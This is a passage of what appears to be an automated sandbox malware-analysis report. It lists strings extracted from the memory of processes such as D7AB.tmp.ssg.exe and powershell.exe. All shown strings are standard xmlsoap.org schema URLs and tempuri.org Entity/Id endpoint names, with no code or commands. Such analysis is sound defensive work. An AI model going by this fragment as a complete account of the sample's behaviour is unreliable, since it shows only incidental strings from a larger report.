Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002A8E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.datacontract.org/2004/07/System.ServiceModelD
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002A8E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.datacontract.org/2004/07/System.ServiceModeld
Source: explorer.exe, 00000004.00000000.2051826790.0000000008870000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.3422880933.0000000007DC0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.3464363955.0000000008890000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://schemas.micro
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
Source: powershell.exe, 0000001F.00000002.2524411157.000002E536162000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.2524332986.0000021990BF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rmX
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Renew
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/spnego
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2524411157.000002E535F41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.2524332986.00000219909D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2006/02/addressingidentity
Source: powershell.exe, 0000001F.00000002.2524411157.000002E536162000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.2524332986.0000021990BF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002A8E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/:hardwares.
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/D
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id1
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002A85000.00000004.00000800.00020000.00000000.sdmp, D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id10
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id10Response
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id11
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id11Response
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp, ssg.exe, 0000002C.00000002.3006898229.0000000003987000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id11ResponseD
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id12
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id12Response
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000029EF000.00000004.00000800.00020000.00000000.sdmp, ssg.exe, 0000002C.00000002.3006898229.00000000035D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id12ResponseD
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id13
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmp, ssg.exe, 0000002C.00000002.3006898229.0000000003987000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id13Response
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002AB6000.00000004.00000800.00020000.00000000.sdmp, ssg.exe, 0000002C.00000002.3006898229.0000000003987000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id13ResponseD
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id14
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id14Response
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000029EF000.00000004.00000800.00020000.00000000.sdmp, ssg.exe, 0000002C.00000002.3006898229.0000000003987000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id14ResponseD
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id15
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id15Response
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002ADF000.00000004.00000800.00020000.00000000.sdmp, D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id15ResponseD
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id16
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp, D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id16Response
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000029EF000.00000004.00000800.00020000.00000000.sdmp, ssg.exe, 0000002C.00000002.3006898229.00000000035D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id16ResponseD
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id17
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id17Response
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id17ResponseD
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id18
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id18Response
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id18ResponseD
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id19
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id19Response
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id19ResponseD
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id1Response
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id1ResponseD
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id2
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id20
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id20Response
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id20ResponseD
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id21
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id21Response
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp, ssg.exe, 0000002C.00000002.3006898229.00000000035D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id21ResponseD
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id22
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp, D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id22Response
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002AB6000.00000004.00000800.00020000.00000000.sdmp, ssg.exe, 0000002C.00000002.3006898229.00000000035D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id22ResponseD
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp, D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id23
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp, D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmp, ssg.exe, 0000002C.00000002.3006898229.00000000035D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id23Response
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002AB6000.00000004.00000800.00020000.00000000.sdmp, ssg.exe, 0000002C.00000002.3006898229.00000000035D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id23ResponseD
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id24
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id24Response
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id2Response
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id2ResponseD
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id3
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id3Response
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id4
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id4Response
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id4ResponseD
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id5
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id5Response
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id5ResponseD
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id6
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id6Response
